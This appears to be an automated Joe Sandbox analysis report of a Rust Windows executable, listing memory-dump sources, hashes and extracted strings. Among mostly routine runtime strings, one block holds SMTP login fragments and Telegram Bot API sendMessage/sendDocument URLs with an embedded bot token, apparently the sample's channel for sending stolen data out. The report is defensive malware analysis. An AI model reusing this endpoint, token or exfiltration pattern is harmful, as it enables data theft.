                                            • Instruction Fuzzy Hash: 6602E812E0CB8681E6119B25E4A13FD5350EF957A4F089371DEADA27E5EF2CE1C68740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: 235$334$334$EHLO ADMINAUTH LOGINfailhttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977
                                            • API String ID: 3298025750-2630474875
                                            • Opcode ID: f44b81f71e3f38342acf14256a55e5a13814400b5e9365e6584d9671bde5fa5c
                                            • Instruction ID: e4f3a2d455cb23f5f3d01a7163bf7f192102ec292ab45f85e400db7a2c7a2389
                                            • Opcode Fuzzy Hash: f44b81f71e3f38342acf14256a55e5a13814400b5e9365e6584d9671bde5fa5c
                                            • Instruction Fuzzy Hash: 8712722664868282EB698B23E4A03FA77A0FF45784F484075DBDE937A1DF3DE549C301
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 0-2333694755
                                            • Opcode ID: cbe803f7ec6a18f9030b7c4cb54956ece02e370ea0a9b6f968dd8258901fc0b0
                                            • Instruction ID: a0a02e0ff54053b572a18e401d6fc75891605cbe0cccfca94c7dfd7df22ad4ed
                                            • Opcode Fuzzy Hash: cbe803f7ec6a18f9030b7c4cb54956ece02e370ea0a9b6f968dd8258901fc0b0
                                            • Instruction Fuzzy Hash: 48B1E261A08B5681FA10DB12E8E07BD2760EF85B84F5D80B6DE4DA77A5DF3CE582C340
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: ,(><&*@$.llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$::_$$RUST_MIN_STACK()/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\core\src\num\mod.rs$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1475443563-4223493616
                                            • Opcode ID: 99c6d4ea137373bdbbacc61f600efb98647a8c51ea272c0afec2757e9b89d760
                                            • Instruction ID: 619d12278fb55392f03de5d6a347617051ad2198a4adb25ee10302d1a76463aa
                                            • Opcode Fuzzy Hash: 99c6d4ea137373bdbbacc61f600efb98647a8c51ea272c0afec2757e9b89d760
                                            • Instruction Fuzzy Hash: 73D26462E589A241FF258B14D4A46BC6B61EB05798F4C42B1DE9EA37DCDF3CE941C302
                                            APIs
                                            Strings
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF6544877CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs
                                            • API String ID: 3702945584-1759521695
                                            • Opcode ID: 19e9d1eacd155317eccecb38f6ea4d160c39881b3a330cf0dfd95c2e5b666cf8
                                            • Instruction ID: 8939c098f1b7f39b5d9322d3ea32dbd2d589fea9a0c9337c5f45099e2585f1a5
                                            • Opcode Fuzzy Hash: 19e9d1eacd155317eccecb38f6ea4d160c39881b3a330cf0dfd95c2e5b666cf8
                                            • Instruction Fuzzy Hash: 22812861B18B8581FE109B54A8B13BB6360FF84380F489576DE8EB6B9ADF3CE141C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID:
                                            • API String ID: 231171946-0
                                            • Opcode ID: 60013d09134a13cacb7750ef1a12d4fec63ccdcefa74daea2274ed5029be60e7
                                            • Instruction ID: ae593fbbb0ff13bb181ea51f3ef31a3cb7cf52afacdf24194faa004544325038
                                            • Opcode Fuzzy Hash: 60013d09134a13cacb7750ef1a12d4fec63ccdcefa74daea2274ed5029be60e7
                                            • Instruction Fuzzy Hash: 52021222B18BC181E6219B26A4517FAA360FF95BC4F485731EE8D62BA5EF3DD181C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorFrequencyLastPerformanceQuery
                                            • String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                            • API String ID: 3362413890-1633623230
                                            • Opcode ID: e4c183483942a1d4c0c1312c4e0dcc0139cf888d8e79ed2ffeb445847da991db
                                            • Instruction ID: 3a2f0544c7bc1d834dd40a536d94f86640e1595c1d9211812bc4ca63577f31aa
                                            • Opcode Fuzzy Hash: e4c183483942a1d4c0c1312c4e0dcc0139cf888d8e79ed2ffeb445847da991db
                                            • Instruction Fuzzy Hash: CC516911F6AA5661EB15CB60D9A0BB913A0EF40784F5CC075DD0FA3B98DE2CA6428300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: Content-Typeapplication/jsonsrc\tg.rs
                                            • API String ID: 3510742995-3066620823
                                            • Opcode ID: 645710806b58f9ddbd9f73631e4cc0b3c1c177ae641ddad6094c8280aa47dafa
                                            • Instruction ID: dcb217958f5f73e36f661b6a0f83dd9d2e91643883a29069ef3c15c19e9f5291
                                            • Opcode Fuzzy Hash: 645710806b58f9ddbd9f73631e4cc0b3c1c177ae641ddad6094c8280aa47dafa
                                            • Instruction Fuzzy Hash: ED221922A0E78385EA218B51E4E03BDA791FB55380F5C46B5DACEA27E5DF3CD865C700
                                            Strings
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF654410B1F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs
                                            • API String ID: 0-1759521695
                                            • Opcode ID: 8248316d322deaa6ba58f60b82040c7b5b4210781411cadd322589a26021943e
                                            • Instruction ID: 6fd96f84543eba28ad42de746204d19bfd92db06139d1c428508bda1915573e1
                                            • Opcode Fuzzy Hash: 8248316d322deaa6ba58f60b82040c7b5b4210781411cadd322589a26021943e
                                            • Instruction Fuzzy Hash: 76A14422A5964581FB158B22C5A07782761FF55BC8F0CA2B1DE4DA7BD9EF3CE456C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: assertion failed: N::next(&stream).is_none()
                                            • API String ID: 1475443563-2991187163
                                            • Opcode ID: 1ab49cdb4b58c0c57bb72d54e07624dd674f3932c68a4d7b99ade0bb623d78ab
                                            • Instruction ID: d3f5fd4acd7eaf669be74c90cf25e5dcf3484dfdedf705cb9f26059e9aaa7bfa
                                            • Opcode Fuzzy Hash: 1ab49cdb4b58c0c57bb72d54e07624dd674f3932c68a4d7b99ade0bb623d78ab
                                            • Instruction Fuzzy Hash: 1F423C72A0C68186EB648B52E4A17BEBBA0FB457C4F485172EE8D937A4DF3CD541C740
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: arenegyl$modnarod$setybdet$uespemos
                                            • API String ID: 0-66988881
                                            • Opcode ID: da9d6900f34642e66a07183256a9745014616205da488a57059c192c66cb204a
                                            • Instruction ID: 7ef7b481baf53d0c3cb23cab73a4575838201cda5dc5d534b1722f29bc863d80
                                            • Opcode Fuzzy Hash: da9d6900f34642e66a07183256a9745014616205da488a57059c192c66cb204a
                                            • Instruction Fuzzy Hash: 0E21B8E5B58F8042FE80DBE5787636BA262A3457C0F40E036EE4D9770ADF3DD1528644
                                            Strings
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF6543AC246
                                            • core missing, xrefs: 00007FF6543AC125
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$core missing
                                            • API String ID: 0-790241909
                                            • Opcode ID: 2088bf2f338c5d839e28c22e667815e636789edbe8dc7fbf7e7ab80c7a5e07ec
                                            • Instruction ID: cd64ff373111f6f0df88d4dbfc804eecd4af5f722dd7958d32910231fe8d63ab
                                            • Opcode Fuzzy Hash: 2088bf2f338c5d839e28c22e667815e636789edbe8dc7fbf7e7ab80c7a5e07ec
                                            • Instruction Fuzzy Hash: F5328C3294DAC280EA719B12E4A43FE7360FF94750F484672DA9DA26E9DF7CE185C740
                                            Strings
                                            • A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!, xrefs: 00007FF654530954
                                            • Timer already fired, xrefs: 00007FF6545309BB
                                            • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00007FF65453096C, 00007FF654530AC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!$Timer already fired$overflow when adding duration to instantlibrary\std\src\time.rs
                                            • API String ID: 0-205797023
                                            • Opcode ID: 6982010f73a87ee8b6a29bc155f7fe788ae3ee72d5e05ae4e297d6ef0d7b8b6d
                                            • Instruction ID: 8e246d7036891de284810eb06405a15300a301ada797868c7ef6eab5a12a227f
                                            • Opcode Fuzzy Hash: 6982010f73a87ee8b6a29bc155f7fe788ae3ee72d5e05ae4e297d6ef0d7b8b6d
                                            • Instruction Fuzzy Hash: 58E10562B1978652EE54DF14E4A03B92390FB40BA4F584375DA6EA7BD8DF3CE452C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: punycode{-0
                                            • API String ID: 2221118986-3751456247
                                            • Opcode ID: a3209c7f2b4eb40becf3acc722cdc418c2d243ee073d6fb77b24d3e163e7fdac
                                            • Instruction ID: f97072ab1443d45bc37c5749041564934ddff48f1f0920b929e2b43fe181badd
                                            • Opcode Fuzzy Hash: a3209c7f2b4eb40becf3acc722cdc418c2d243ee073d6fb77b24d3e163e7fdac
                                            • Instruction Fuzzy Hash: 1D220562B49BD586EF648B25D4A47FC2791EB19BD4F488171CE1DA7BC8DF3CA9428300
                                            APIs
                                            Strings
                                            • RNG seed generator is internally corruptC:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\util\rand\rt.rs, xrefs: 00007FF654526E4C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: RNG seed generator is internally corruptC:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\util\rand\rt.rs
                                            • API String ID: 3114109732-241763309
                                            • Opcode ID: d397667e4653154ccd3b985db46042a57eacdd728090394702b76fcd12573a52
                                            • Instruction ID: bfbd6671469fe6fb11904faa77f44e2c87840f0f396b95c6a33d866895a8bd7d
                                            • Opcode Fuzzy Hash: d397667e4653154ccd3b985db46042a57eacdd728090394702b76fcd12573a52
                                            • Instruction Fuzzy Hash: 8C315922B0D39241FB509B299CD016A67D29F85B94F5C81B2CD8C97795CD3EE40BC380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeapmemcpy
                                            • String ID:
                                            • API String ID: 673829100-0
                                            • Opcode ID: 87d3a5fbaf95b88c7cc1da5d28121b18c1a90711c5d1743f034c47ca3b9043d4
                                            • Instruction ID: 1f4c13694b62aed3098cde88f449cb663e1b1f5c56c44c381b470fe2ce9d126a
                                            • Opcode Fuzzy Hash: 87d3a5fbaf95b88c7cc1da5d28121b18c1a90711c5d1743f034c47ca3b9043d4
                                            • Instruction Fuzzy Hash: FE627A62E4E69268FB258B2184A07BD3B91EB11794F0C81B1DE5DAB7C9DF7C99C1D300
                                            APIs
                                            Strings
                                            • 127.0.0.1:0C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\mod.rs, xrefs: 00007FF6543BE17A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
